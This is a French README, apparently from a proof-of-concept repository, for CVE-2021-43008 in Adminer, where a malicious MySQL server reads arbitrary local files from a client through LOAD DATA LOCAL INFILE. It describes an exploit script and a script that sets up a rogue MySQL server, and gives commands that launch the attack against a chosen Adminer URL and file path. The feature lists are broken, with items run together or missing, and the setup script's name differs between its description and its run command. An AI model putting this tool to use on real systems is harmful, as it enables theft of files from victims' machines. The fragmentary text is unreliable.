
Adminer CVE-2021-43008 PoC
Preuve de concept pour CVE-2021-43008 affectant Adminer.
Cette vulnérabilité permet à un serveur MySQL malveillant de demander des fichiers locaux arbitraires depuis la machine cliente lorsque LOAD DATA LOCAL INFILE est activé.
Le dépôt contient des outils pour reproduire l'attaque.
exploit.py
Script Python qui automatise l'interaction avec Adminer.
Fonctionnalités :
LOAD DATA LOCAL INFILEsetup_mysql_server.sh
Script d'aide qui prépare un serveur MySQL/MariaDB malveillant pour l'exploitation.
Le script :
local_infilePython 3.x
Bibliothèques : requests beautifulsoup4 lxml
Exécutez le script de configuration :
sudo ./script.sh <IP> <PORT>
Puis lancez l'exploit :
python exploit.py <adminer_url> <mysql_host> <username> <password> <database> <file_path>